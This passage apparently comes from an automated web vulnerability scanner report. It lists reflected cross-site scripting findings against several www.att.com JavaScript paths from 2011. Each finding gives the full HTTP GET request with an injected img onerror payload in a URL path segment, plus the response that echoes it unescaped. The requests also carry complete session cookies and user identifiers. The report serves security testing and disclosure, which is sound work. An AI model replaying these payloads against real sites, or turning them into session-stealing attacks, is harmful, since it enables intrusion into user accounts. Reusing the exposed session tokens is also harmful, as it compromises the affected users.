Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:34 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsc4874"><img src=a onerror=alert(1)>d5d0d3e26ba/posUtil.js">
...[SNIP]...

1.7. https://www.att.com/olam/js/posUtil.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/posUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b568f"><img%20src%3da%20onerror%3dalert(1)>4c096ab377d was submitted in the REST URL parameter 3. This input was echoed as b568f"><img src=a onerror=alert(1)>4c096ab377d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/posUtil.jsb568f"><img%20src%3da%20onerror%3dalert(1)>4c096ab377d HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:39 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A9D148FA7125107197819E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/posUtil.jsb568f"><img src=a onerror=alert(1)>4c096ab377d">
...[SNIP]...

1.8. https://www.att.com/olam/js/registration.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/registration.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f296"><img%20src%3da%20onerror%3dalert(1)>7b37fb08545 was submitted in the REST URL parameter 2. This input was echoed as 3f296"><img src=a onerror=alert(1)>7b37fb08545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js3f296"><img%20src%3da%20onerror%3dalert(1)>7b37fb08545/registration.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9093
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js3f296"><img src=a onerror=alert(1)>7b37fb08545/registration.js">
...[SNIP]...

1.9. https://www.att.com/olam/js/registration.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/registration.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea74f"><img%20src%3da%20onerror%3dalert(1)>36c158259c5 was submitted in the REST URL parameter 3. This input was echoed as ea74f"><img src=a onerror=alert(1)>36c158259c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/registration.jsea74f"><img%20src%3da%20onerror%3dalert(1)>36c158259c5 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9093
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:41 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA874D587125107197919E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/registration.jsea74f"><img src=a onerror=alert(1)>36c158259c5">
...[SNIP]...

1.10. https://www.att.com/olam/js/sniffer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/sniffer.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbb"><img%20src%3da%20onerror%3dalert(1)>2ad5590c1ca was submitted in the REST URL parameter 2. This input was echoed as c9dbb"><img src=a onerror=alert(1)>2ad5590c1ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsc9dbb"><img%20src%3da%20onerror%3dalert(1)>2ad5590c1ca/sniffer.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:34 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsc9dbb"><img src=a onerror=alert(1)>2ad5590c1ca/sniffer.js">
...[SNIP]...

1.11. https://www.att.com/olam/js/sniffer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/sniffer.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f9f"><img%20src%3da%20onerror%3dalert(1)>244f3de8fc was submitted in the REST URL parameter 3. This input was echoed as a7f9f"><img src=a onerror=alert(1)>244f3de8fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/sniffer.jsa7f9f"><img%20src%3da%20onerror%3dalert(1)>244f3de8fc HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA0D523C7125107197869E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/sniffer.jsa7f9f"><img src=a onerror=alert(1)>244f3de8fc">
...[SNIP]...

1.12. https://www.att.com/olam/js/tool-tips.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/tool-tips.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed91"><img%20src%3da%20onerror%3dalert(1)>28b739d7fdf was submitted in the REST URL parameter 2. This input was echoed as 2ed91"><img src=a onerror=alert(1)>28b739d7fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js2ed91"><img%20src%3da%20onerror%3dalert(1)>28b739d7fdf/tool-tips.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9090
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js2ed91"><img src=a onerror=alert(1)>28b739d7fdf/tool-tips.js">
...[SNIP]...

1.13. https://www.att.com/olam/js/tool-tips.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/tool-tips.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97aac"><img%20src%3da%20onerror%3dalert(1)>31f6632615b was submitted in the REST URL parameter 3. This input was echoed as 97aac"><img src=a onerror=alert(1)>31f6632615b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/tool-tips.js97aac"><img%20src%3da%20onerror%3dalert(1)>31f6632615b HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9090
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA0D3B627125107197859E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/tool-tips.js97aac"><img src=a onerror=alert(1)>31f6632615b">
...[SNIP]...

1.14. https://www.att.com/olam/js/validate.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/validate.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e2da"><img%20src%3da%20onerror%3dalert(1)>104eda6ef9b was submitted in the REST URL parameter 2. This input was echoed as 6e2da"><img src=a onerror=alert(1)>104eda6ef9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js6e2da"><img%20src%3da%20onerror%3dalert(1)>104eda6ef9b/validate.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
